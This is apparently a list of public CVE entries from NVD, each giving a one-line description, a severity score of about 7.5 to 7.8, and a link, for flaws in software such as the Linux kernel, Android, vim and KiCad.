CVE-2021-29464 Exiv2 is a command-line utility and C++ library for reading, writing, deleting, and modifying the metadata of image files. A heap buffer overflow was found in Exiv2 versions v0.27.3 and earlier. The heap overflow is triggered when Exiv2 is used to write metadata into a crafted image file. An attacker could potentially exploit the vulnerability to gain code execution, if they can trick the victim into running Exiv2 on a crafted image file. Note that this bug is only triggered when writing the metadata, which is a less frequently used Exiv2 operation than reading the metadata. For example, to trigger the bug in the Exiv2 command-line application, you need to add an extra command-line argument such as `insert`. The bug is fixed in version v0.27.4. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2021-29464
CVE-2021-29100 A path traversal vulnerability exists in Esri ArcGIS Earth versions 1.11.0 and below which allows arbitrary file creation on an affected system through crafted input. An attacker could exploit this vulnerability to gain arbitrary code execution under security context of the user running ArcGIS Earth by inducing the user to upload a crafted file to an affected system. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2021-29100
CVE-2021-22543 An issue was discovered in Linux: KVM through Improper handling of VM_IO|VM_PFNMAP vmas in KVM can bypass RO checks and can lead to pages being freed while still accessible by the VMM and guest. This allows users with the ability to start and control a VM to read/write random pages of memory and can result in local privilege escalation. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2021-22543
CVE-2021-22118 In Spring Framework, versions 5.2.x prior to 5.2.15 and versions 5.3.x prior to 5.3.7, a WebFlux application is vulnerable to a privilege escalation: by (re)creating the temporary storage directory, a locally authenticated malicious user can read or modify files that have been uploaded to the WebFlux application, or overwrite arbitrary files with multipart request data. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2021-22118
CVE-2021-22555 A heap out-of-bounds write affecting Linux since v2.6.19-rc1 was discovered in net/netfilter/x_tables.c. This allows an attacker to gain privileges or cause a DoS (via heap memory corruption) through user name space 7.8 https://nvd.nist.gov/vuln/detail/CVE-2021-22555
CVE-2021-3612 An out-of-bounds memory write flaw was found in the Linux kernel's joystick devices subsystem in versions before 5.9-rc1, in the way the user calls ioctl JSIOCSBTNMAP. This flaw allows a local user to crash the system or possibly escalate their privileges on the system. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2021-3612
CVE-2021-26089 An improper symlink following in FortiClient for Mac 6.4.3 and below may allow an non-privileged user to execute arbitrary privileged shell commands during installation phase. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2021-26089
CVE-2021-38166 In kernel/bpf/hashtab.c in the Linux kernel through 5.13.8, there is an integer overflow and out-of-bounds write when many elements are placed in a single bucket. NOTE: exploitation might be impractical without the CAP_SYS_ADMIN capability. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2021-38166
CVE-2021-30916 A memory corruption issue was addressed with improved memory handling. This issue is fixed in iOS 15.1 and iPadOS 15.1, macOS Monterey 12.0.1, iOS 14.8.1 and iPadOS 14.8.1, Security Update 2021-007 Catalina, macOS Big Sur 11.6.1. A malicious application may be able to execute arbitrary code with kernel privileges. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2021-30916
CVE-2021-30922 Multiple out-of-bounds write issues were addressed with improved bounds checking. This issue is fixed in macOS Big Sur 11.6.1. A malicious application may be able to execute arbitrary code with kernel privileges. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2021-30922
CVE-2021-30937 A memory corruption vulnerability was addressed with improved locking. This issue is fixed in macOS Big Sur 11.6.2, tvOS 15.2, macOS Monterey 12.1, Security Update 2021-008 Catalina, iOS 15.2 and iPadOS 15.2, watchOS 8.3. A malicious application may be able to execute arbitrary code with kernel privileges. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2021-30937
CVE-2021-30942 Description: A memory corruption issue in the processing of ICC profiles was addressed with improved input validation. This issue is fixed in macOS Big Sur 11.6.2, tvOS 15.2, macOS Monterey 12.1, Security Update 2021-008 Catalina, iOS 15.2 and iPadOS 15.2, watchOS 8.3. Processing a maliciously crafted image may lead to arbitrary code execution. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2021-30942
CVE-2021-35033 A vulnerability in specific versions of Zyxel NBG6818, NBG7815, WSQ20, WSQ50, WSQ60, and WSR30 firmware with pre-configured password management could allow an attacker to obtain root access of the device, if the local attacker dismantles the device and uses a USB-to-UART cable to connect the device, or if the remote assistance feature had been enabled by an authenticated user. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2021-35033
CVE-2018-25020 The BPF subsystem in the Linux kernel before 4.17 mishandles situations with a long jump over an instruction sequence where inner instructions require substantial expansions into multiple BPF instructions, leading to an overflow. This affects kernel/bpf/core.c and net/core/filter.c. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2018-25020
CVE-2020-16156 CPAN 2.28 allows Signature Verification Bypass. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2020-16156
CVE-2021-44001 A vulnerability has been identified in JT2Go (All versions < V13.2.0.5), Teamcenter Visualization (All versions < V13.2.0.5). The DL180pdfl.dll contains an out of bounds write past the end of an allocated structure while parsing specially crafted PDF files. This could allow an attacker to execute code in the context of the current process. (ZDI-CAN-14974) 7.8 https://nvd.nist.gov/vuln/detail/CVE-2021-44001
CVE-2021-44002 A vulnerability has been identified in JT2Go (All versions < V13.2.0.5), Teamcenter Visualization (All versions < V13.2.0.5). The Jt1001.dll contains an out of bounds write past the end of an allocated structure while parsing specially crafted JT files. This could allow an attacker to execute code in the context of the current process. (ZDI-CAN-15058) 7.8 https://nvd.nist.gov/vuln/detail/CVE-2021-44002
CVE-2021-44013 A vulnerability has been identified in JT2Go (All versions < V13.2.0.5), Teamcenter Visualization (All versions < V13.2.0.5). The DL180pdfl.dll contains an out of bounds write past the end of an allocated structure while parsing specially crafted JT files. This could allow an attacker to execute code in the context of the current process. (ZDI-CAN-15103) 7.8 https://nvd.nist.gov/vuln/detail/CVE-2021-44013
CVE-2021-44014 A vulnerability has been identified in JT2Go (All versions < V13.2.0.5), Teamcenter Visualization (All versions < V13.2.0.5). The Jt1001.dll contains a use-after-free vulnerability that could be triggered while parsing specially crafted JT files. An attacker could leverage this vulnerability to execute code in the context of the current process. (ZDI-CAN-15057) 7.8 https://nvd.nist.gov/vuln/detail/CVE-2021-44014
CVE-2021-43238 Windows Remote Access Elevation of Privilege Vulnerability 7.8 https://nvd.nist.gov/vuln/detail/CVE-2021-43238
CVE-2021-0675 In alac decoder, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS06064258; Issue ID: ALPS06064258. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2021-0675
CVE-2021-4008 A flaw was found in xorg-x11-server in versions before 21.1.2 and before 1.20.14. An out-of-bounds access can occur in the SProcRenderCompositeGlyphs function. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2021-4008
CVE-2021-4009 A flaw was found in xorg-x11-server in versions before 21.1.2 and before 1.20.14. An out-of-bounds access can occur in the SProcXFixesCreatePointerBarrier function. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2021-4009
CVE-2021-4010 A flaw was found in xorg-x11-server in versions before 21.1.2 and before 1.20.14. An out-of-bounds access can occur in the SProcScreenSaverSuspend function. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2021-4010
CVE-2021-4011 A flaw was found in xorg-x11-server in versions before 21.1.2 and before 1.20.14. An out-of-bounds access can occur in the SwapCreateRegister function. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2021-4011
CVE-2021-43554 FATEK WinProladder Versions 3.30_24518 and prior are vulnerable to an out-of-bounds write while processing project files, which may allow an attacker to execute arbitrary code. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2021-43554
CVE-2021-43556 FATEK WinProladder Versions 3.30_24518 and prior are vulnerable to a stack-based buffer overflow while processing project files, which may allow an attacker to execute arbitrary code. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2021-43556
CVE-2021-43579 A stack-based buffer overflow in image_load_bmp() in HTMLDOC <= 1.9.13 results in remote code execution if the victim converts an HTML document linking to a crafted BMP file. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2021-43579
CVE-2022-21882 Win32k Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-21887. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2022-21882
CVE-2022-21917 HEVC Video Extensions Remote Code Execution Vulnerability. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2022-21917
CVE-2022-24122 kernel/ucount.c in the Linux kernel 5.14 through 5.16.4, when unprivileged user namespaces are enabled, allows a use-after-free and privilege escalation because a ucounts object can outlive its namespace. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2022-24122
CVE-2022-0408 Stack-based Buffer Overflow in GitHub repository vim/vim prior to 8.2. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2022-0408
CVE-2022-0413 Use After Free in GitHub repository vim/vim prior to 8.2. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2022-0413
CVE-2022-0417 Heap-based Buffer Overflow GitHub repository vim/vim prior to 8.2. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2022-0417
CVE-2022-0443 Use After Free in GitHub repository vim/vim prior to 8.2. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2022-0443
CVE-2022-23946 A stack-based buffer overflow vulnerability exists in the Gerber Viewer gerber and excellon GCodeNumber parsing functionality of KiCad EDA 6.0.1 and master commit de006fc010. A specially-crafted gerber or excellon file can lead to code execution. An attacker can provide a malicious file to trigger this vulnerability. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2022-23946
CVE-2022-23947 A stack-based buffer overflow vulnerability exists in the Gerber Viewer gerber and excellon DCodeNumber parsing functionality of KiCad EDA 6.0.1 and master commit de006fc010. A specially-crafted gerber or excellon file can lead to code execution. An attacker can provide a malicious file to trigger this vulnerability. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2022-23947
CVE-2022-21844 HEVC Video Extensions Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-21926, CVE-2022-21927. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2022-21844
CVE-2022-21926 HEVC Video Extensions Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-21844, CVE-2022-21927. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2022-21926
CVE-2022-21927 HEVC Video Extensions Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-21844, CVE-2022-21926. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2022-21927
CVE-2022-0529 A flaw was found in Unzip. The vulnerability occurs during the conversion of a wide string to a local string that leads to a heap of out-of-bound write. This flaw allows an attacker to input a specially crafted zip file, leading to a crash or code execution. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2022-0529
CVE-2022-0530 A flaw was found in Unzip. The vulnerability occurs during the conversion of a wide string to a local string that leads to a heap of out-of-bound write. This flaw allows an attacker to input a specially crafted zip file, leading to a crash or code execution. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2022-0530
CVE-2022-24958 drivers/usb/gadget/legacy/inode.c in the Linux kernel through 5.16.8 mishandles dev->buf release. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2022-24958
CVE-2022-0572 Heap-based Buffer Overflow in GitHub repository vim/vim prior to 8.2. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2022-0572
CVE-2022-23803 A stack-based buffer overflow vulnerability exists in the Gerber Viewer gerber and excellon ReadXYCoord coordinate parsing functionality of KiCad EDA 6.0.1 and master commit de006fc010. A specially-crafted gerber or excellon file can lead to code execution. An attacker can provide a malicious file to trigger this vulnerability. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2022-23803
CVE-2022-23804 A stack-based buffer overflow vulnerability exists in the Gerber Viewer gerber and excellon ReadIJCoord coordinate parsing functionality of KiCad EDA 6.0.1 and master commit de006fc010. A specially-crafted gerber or excellon file can lead to code execution. An attacker can provide a malicious file to trigger this vulnerability. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2022-23804
CVE-2022-0629 Stack-based Buffer Overflow in GitHub repository vim/vim prior to 8.2. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2022-0629
CVE-2022-25365 Docker Desktop before 4.5.1 on Windows allows attackers to move arbitrary files. NOTE: this issue exists because of an incomplete fix for CVE-2022-23774. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2022-25365
CVE-2022-0516 A vulnerability was found in kvm_s390_guest_sida_op in the arch/s390/kvm/kvm-s390.c function in KVM for s390 in the Linux kernel. This flaw allows a local attacker with a normal user privilege to obtain unauthorized memory write access. This flaw affects Linux kernel versions prior to 5.17-rc4. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2022-0516
CVE-2022-0847 A flaw was found in the way the "flags" member of the new pipe buffer structure was lacking proper initialization in copy_page_to_iter_pipe and push_pipe functions in the Linux kernel and could thus contain stale values. An unprivileged local user could use this flaw to write to pages in the page cache backed by read only files and as such escalate their privileges on the system. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2022-0847
CVE-2022-20001 fish is a command line shell. fish version 3.1.0 through version 3.3.1 is vulnerable to arbitrary code execution. git repositories can contain per-repository configuration that change the behavior of git, including running arbitrary commands. When using the default configuration of fish, changing to a directory automatically runs `git` commands in order to display information about the current repository in the prompt. If an attacker can convince a user to change their current directory into one controlled by the attacker, such as on a shared file system or extracted archive, fish will run arbitrary commands under the attacker's control. This problem has been fixed in fish 3.4.0. Note that running git in these directories, including using the git tab completion, remains a potential trigger for this issue. As a workaround, remove the `fish_git_prompt` function from the prompt. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2022-20001
CVE-2021-4197 An unprivileged write to the file handler flaw in the Linux kernel's control groups and namespaces subsystem was found in the way users have access to some less privileged process that are controlled by cgroups and have higher privileged parent process. It is actually both for cgroup2 and cgroup1 versions of control groups. A local user could use this flaw to crash the system or escalate their privileges on the system. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2021-4197
CVE-2022-27940 tcprewrite in Tcpreplay 4.4.1 has a heap-based buffer over-read in get_ipv6_next in common/get.c. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2022-27940
CVE-2022-27941 tcprewrite in Tcpreplay 4.4.1 has a heap-based buffer over-read in get_l2len_protocol in common/get.c. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2022-27941
CVE-2022-27942 tcpprep in Tcpreplay 4.4.1 has a heap-based buffer over-read in parse_mpls in common/get.c. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2022-27942
CVE-2022-26259 A buffer over flow in Xiongmai DVR devices NBD80X16S-KL, NBD80X09S-KL, NBD80X08S-KL, NBD80X09RA-KL, AHB80X04R-MH, AHB80X04R-MH-V2, AHB80X04-R-MH-V3, AHB80N16T-GS, AHB80N32F4-LME, and NBD90S0VT-QW allows attackers to cause a Denial of Service (DoS) via a crafted RSTP request. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2022-26259
CVE-2022-26839 Delta Electronics DIAEnergie (All versions prior to 1.8.02.004) is vulnerable to an incorrect default permission in the DIAEnergie application, which may allow an attacker to plant new files (such as DLLs) or replace existing executable files. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2022-26839
CVE-2022-21821 NVIDIA CUDA Toolkit SDK contains an integer overflow vulnerability in cuobjdump.To exploit this vulnerability, a remote attacker would require a local user to download a specially crafted, corrupted file and locally execute cuobjdump against the file. Such an attack may lead to remote code execution that causes complete denial of service and an impact on data confidentiality and integrity. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2022-21821
CVE-2022-23868 RuoYi v4.7.2 contains a CSV injection vulnerability through ruoyi-admin when a victim opens .xlsx log file. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2022-23868
CVE-2021-1000 In createBluetoothDeviceSlice of ConnectedDevicesSliceProvider.java, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-185190688 7.8 https://nvd.nist.gov/vuln/detail/CVE-2021-1000
CVE-2021-1033 In createGeneralSlice of ConnectedDevicesSliceProvider.java.java, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-185247656 7.8 https://nvd.nist.gov/vuln/detail/CVE-2021-1033
CVE-2021-39741 In Keymaster, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-173567719 7.8 https://nvd.nist.gov/vuln/detail/CVE-2021-39741
CVE-2021-39743 In PackageManager, there is a possible way to update the last usage time of another package due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-201534884 7.8 https://nvd.nist.gov/vuln/detail/CVE-2021-39743
CVE-2021-39746 In PermissionController, there is a possible way to delete some local files due to an unsafe PendingIntent. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-194696395 7.8 https://nvd.nist.gov/vuln/detail/CVE-2021-39746
CVE-2021-39749 In WindowManager, there is a possible way to start non-exported and protected activities due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-205996115 7.8 https://nvd.nist.gov/vuln/detail/CVE-2021-39749
CVE-2021-39750 In PackageManager, there is a possible way to change the splash screen theme of other apps due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-206474016 7.8 https://nvd.nist.gov/vuln/detail/CVE-2021-39750
CVE-2021-39752 In Bubbles, there is a possible way to interfere with Bubbles due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-202756848 7.8 https://nvd.nist.gov/vuln/detail/CVE-2021-39752
CVE-2021-39758 In WindowManager, there is a possible way to start a foreground activity from the background due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-205130886 7.8 https://nvd.nist.gov/vuln/detail/CVE-2021-39758
CVE-2021-39759 In libstagefright, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-180200830 7.8 https://nvd.nist.gov/vuln/detail/CVE-2021-39759
CVE-2021-39763 In Settings, there is a possible way to make the user enable WiFi due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-199176115 7.8 https://nvd.nist.gov/vuln/detail/CVE-2021-39763
CVE-2021-39764 In Settings, there is a possible way to display an incorrect app name due to improper input validation. This could lead to local escalation of privilege via app spoofing with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-170642995 7.8 https://nvd.nist.gov/vuln/detail/CVE-2021-39764
CVE-2021-39767 In miniadb, there is a possible way to get read/write access to recovery system properties due to an insecure default value. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-201308542 7.8 https://nvd.nist.gov/vuln/detail/CVE-2021-39767
CVE-2021-39768 In Settings, there is a possible way to add an auto-connect WiFi network without the user's consent due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-202017876 7.8 https://nvd.nist.gov/vuln/detail/CVE-2021-39768
CVE-2021-39771 In Settings, there is a possible way to misrepresent which app wants to add a wifi network due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-198661951 7.8 https://nvd.nist.gov/vuln/detail/CVE-2021-39771
CVE-2021-39776 In NFC, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-192614125 7.8 https://nvd.nist.gov/vuln/detail/CVE-2021-39776
CVE-2021-39780 In Traceur, there is a possible bypass of developer settings requirements for capturing system traces due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-204992293 7.8 https://nvd.nist.gov/vuln/detail/CVE-2021-39780
CVE-2021-39781 In SmsController, there is a possible information disclosure due to a permissions bypass. This could lead to local escalation of privilege and sending sms with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-195311502 7.8 https://nvd.nist.gov/vuln/detail/CVE-2021-39781
CVE-2021-39782 In Telephony, there is a possible unauthorized modification of the PLMN SIM file due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-202760015 7.8 https://nvd.nist.gov/vuln/detail/CVE-2021-39782
CVE-2021-39783 In rcsservice, there is a possible way to modify TTY mode due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-197960597 7.8 https://nvd.nist.gov/vuln/detail/CVE-2021-39783
CVE-2021-39784 In CellBroadcastReceiver, there is a possible path to enable specific cellular features due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-200163477 7.8 https://nvd.nist.gov/vuln/detail/CVE-2021-39784
CVE-2021-39787 In SystemUI, there is a possible arbitrary Activity launch due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-202506934 7.8 https://nvd.nist.gov/vuln/detail/CVE-2021-39787
CVE-2021-39789 In Telecom, there is a possible leak of TTY mode change due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-203880906 7.8 https://nvd.nist.gov/vuln/detail/CVE-2021-39789
CVE-2021-39790 In Dialer, there is a possible way to manipulate visual voicemail settings due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-186405146 7.8 https://nvd.nist.gov/vuln/detail/CVE-2021-39790
CVE-2022-20002 In incfs, there is a possible way of mounting on arbitrary paths due to a missing permission check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-198657657 7.8 https://nvd.nist.gov/vuln/detail/CVE-2022-20002
CVE-2022-1160 heap buffer overflow in get_one_sourceline in GitHub repository vim/vim prior to 8.2.4647. 7.8 https://nvd.nist.gov/vuln/detail/CVE-2022-1160
CVE-2021-35653 Vulnerability in the Essbase Administration Services product of Oracle Essbase (component: EAS Console). The supported versions that are affected are Prior to 11.1.2.4.046 and Prior to 21.3. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Essbase Administration Services. While the vulnerability is in Essbase Administration Services, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Essbase Administration Services accessible data. CVSS 3.1 Base Score 7.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N). 7.7 https://nvd.nist.gov/vuln/detail/CVE-2021-35653
CVE-2022-24789 C1 CMS is an open-source, .NET based Content Management System (CMS). Versions prior to 6.12 allow an authenticated user to exploit Server Side Request Forgery (SSRF) by causing the server to make arbitrary GET requests to other servers in the local network or on localhost. The attacker may also truncate arbitrary files to zero size (effectively delete them) leading to denial of service (DoS) or altering application logic. The authenticated user may unknowingly perform the actions by visiting a specially crafted site. Patched in C1 CMS v6.12, no known workarounds exist. 7.6 https://nvd.nist.gov/vuln/detail/CVE-2022-24789
CVE-2016-1455 Cisco NX-OS before 7.0(3)I2(2e) and 7.0(3)I4 before 7.0(3)I4(1) has an incorrect iptables local-interface configuration, which allows remote attackers to obtain sensitive information via TCP or UDP traffic, aka Bug ID CSCuz05365. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2016-1455
CVE-2016-6160 tcprewrite in tcpreplay before 4.1.2 allows remote attackers to cause a denial of service (segmentation fault) via a large frame, a related issue to CVE-2017-14266. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2016-6160
CVE-2018-13112 get_l2len in common/get.c in Tcpreplay 4.3.0 beta1 allows remote attackers to cause a denial of service (heap-based buffer over-read and application crash) via crafted packets, as demonstrated by tcpprep. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2018-13112
CVE-2018-5387 Wizkunde SAMLBase may incorrectly utilize the results of XML DOM traversal and canonicalization APIs in such a way that an attacker may be able to manipulate the SAML data without invalidating the cryptographic signature, allowing the attack to potentially bypass authentication to SAML service providers. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2018-5387
CVE-2018-19052 An issue was discovered in mod_alias_physical_handler in mod_alias.c in lighttpd before 1.4.50. There is potential ../ path traversal of a single directory above an alias target, with a specific mod_alias configuration where the matched alias lacks a trailing '/' character, but the alias target filesystem path does have a trailing '/' character. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2018-19052
CVE-2018-1320 Apache Thrift Java client library versions 0.5.0 through 0.11.0 can bypass SASL negotiation isComplete validation in the org.apache.thrift.transport.TSaslTransport class. An assert used to determine if the SASL handshake had successfully completed could be disabled in production settings making the validation incomplete. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2018-1320
CVE-2019-3599 Information Disclosure vulnerability in Remote logging (which is disabled by default) in McAfee Agent (MA) 5.x allows remote unauthenticated users to access sensitive information via remote logging when it is enabled. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2019-3599
CVE-2019-9638 An issue was discovered in the EXIF component in PHP before 7.1.27, 7.2.x before 7.2.16, and 7.3.x before 7.3.3. There is an uninitialized read in exif_process_IFD_in_MAKERNOTE because of mishandling the maker_note->offset relationship to value_len. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2019-9638
CVE-2019-9639 An issue was discovered in the EXIF component in PHP before 7.1.27, 7.2.x before 7.2.16, and 7.3.x before 7.3.3. There is an uninitialized read in exif_process_IFD_in_MAKERNOTE because of mishandling the data_len variable. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2019-9639
CVE-2019-9640 An issue was discovered in the EXIF component in PHP before 7.1.27, 7.2.x before 7.2.16, and 7.3.x before 7.3.3. There is an Invalid Read in exif_process_SOFn. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2019-9640
CVE-2018-20525 Roxy Fileman 1.4.5 allows Directory Traversal in copydir.php, copyfile.php, and fileslist.php. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2018-20525
CVE-2019-9017 DWRCC in SolarWinds DameWare Mini Remote Control 10.0 x64 has a Buffer Overflow associated with the size field for the machine name. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2019-9017
CVE-2019-5796 Data race in extensions guest view in Google Chrome prior to 73.0.3683.75 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2019-5796
CVE-2019-3644 McAfee Web Gateway (MWG) earlier than 7.8.2.13 is vulnerable to a remote attacker exploiting CVE-2019-9517, potentially leading to a denial of service. This affects the scanning proxies. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2019-3644
CVE-2019-16714 In the Linux kernel before 5.2.14, rds6_inc_info_copy in net/rds/recv.c allows attackers to obtain sensitive information from kernel stack memory because tos and flags fields are not initialized. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2019-16714
CVE-2019-16869 Netty before 4.1.42.Final mishandles whitespace before the colon in HTTP headers (such as a "Transfer-Encoding : chunked" line), which leads to HTTP request smuggling. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2019-16869
CVE-2019-3728 RSA BSAFE Crypto-C Micro Edition versions prior to 4.0.5.4 (in 4.0.x) and 4.1.4 (in 4.1.x) and RSA BSAFE Micro Edition Suite versions prior to 4.0.13 (in 4.0.x) and prior to 4.4 (in 4.1.x, 4.2.x, 4.3.x) are vulnerable to a Buffer Over-read vulnerability when processing DSA signature. A malicious remote user could potentially exploit this vulnerability to cause a crash in the library of the affected system. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2019-3728
CVE-2019-17069 PuTTY before 0.73 might allow remote SSH-1 servers to cause a denial of service by accessing freed memory locations via an SSH1_MSG_DISCONNECT message. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2019-17069
CVE-2019-17673 WordPress before 5.2.4 is vulnerable to poisoning of the cache of JSON GET requests because certain requests lack a Vary: Origin header. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2019-17673
CVE-2019-15703 An Insufficient Entropy in PRNG vulnerability in Fortinet FortiOS 6.2.1, 6.2.0, 6.0.8 and below for device not enable hardware TRNG token and models not support builtin TRNG seed allows attacker to theoretically recover the long term ECDSA secret in a TLS client with a RSA handshake and mutual ECDSA authentication via the help of flush+reload side channel attacks in FortiGate VM models only. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2019-15703
